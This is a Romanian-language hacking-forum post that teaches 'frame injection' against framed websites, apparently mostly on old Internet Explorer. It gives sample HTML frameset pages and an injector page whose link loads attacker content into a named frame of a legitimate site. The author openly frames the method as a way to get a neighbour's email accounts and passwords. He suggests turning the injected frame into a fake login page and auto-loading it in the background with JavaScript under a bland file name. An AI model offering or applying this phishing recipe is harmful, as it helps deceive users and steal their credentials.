Jump to content
0_o

Frame Injection

Recommended Posts

Injectii

Injectari. Toate sunt la moda. Peste tot se gasesc tutoriale de "SQL Injection", "E-Mail Injection", "PHP Injection"... inca nu am vazut nici un tutorial de "Frame Injection" pe forumurile de aici asa ca m-am apucat sa fac eu unu.

Ce inseamna Form Injection ?

Form Injection e o metoda de atac ca oricare alta. Este motivul pentru care Yahoo! Si-a schimbat designul vechi (tineti minte varianta cu fram-uri ?). Este motivul pentru care multi ISP nu ofera hosting pentru paginile care contin frame-uri, este motivul pentru care MSIE e luat la suturi toata ziua si Opera ridicat in slavi

Cum functioneaza Form Injection ?

Ca sa intelegeti functionarea am pregatit cateva pagini HTML simple. Pun mai jos codul corespunzator fiecarei pagini:

index.html

<html><head></head>
<frameset border="0" frameborder="0" framespacing="0" rows="150,*">
    <frame name="frame1" src="frame1.html">
    <frame name="frame2" src="frame2.html">
</frameset>
</html>

frame1.html

<html><head></head>
<body bgcolor="#CCCCCC">
Frame1
</body>
</html>

frame2.html

<html><head></head>
<body bgcolor="#999999">
Frame2
</body></html>

frame3.html

<html><head></head>
<body bgcolor="#FF0000">
Frame3 (cadru injectat)
</body></html>

inj.html

<html><head></head>
<body>
[url="frame3.html"]Click aici ![/url]
</body></html>

Nimic spectaculos pana aici... revenind la functionalitate. Sa presupunem ca vecinul X viziteaza zilnic pagina Y care e construita cu cadre (frame-uri) si va intereseaza niste date care le stie vecinul X (conturi de mail sau alte gainarii).

Am presupus ca pagina X este index.html prezentat mai sus care incarca in pagina 2 cadre si anume frame1.html si frame2.html.

Daca deschideti index.html veti vedea ca cele doua pagini sunt incluse.

OK, now what ? Uploadam inj.html si frame3.html undeva unde avem un cont si il convingem pe vecinul X sa dea click pe adresa fisierului inj.html. Fisierul inj.html are un link catre frame3.html, link care se deschide ( target= ) in frame2.html. Singurul loc in care este declarat frame2 este pagina Y care o viziteaza vecinul (in cazul nostru index.html). Daca dati click pe link-ul din pagina inj.html veti vedea ca Frame2.html care normal e pe un alt server se deschide in cadrul cu numele frame2 (adica, al doilea cadru din index.html).

Simplu, nu ? Mai departe totul tine de imaginatie. Modificati frame3.html sa arate ca o pagina de pe site-ul Y in care se cere user si parola (scam), modificati inj.html sa deschida pagina automat, in background (cu javascript) si, bineinteles, puneti-i un nume mai putin sugestiv

Nota

De mentionat ca tehnica NU functioneaza pe orice browser. Functioneaza pe aproape toate variantele de M$ Internet Explorer, nu functioneaza pe Opera si... testati si voi si spuneti-mi pe ce l-ati facut sa mearga

by operabilu

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...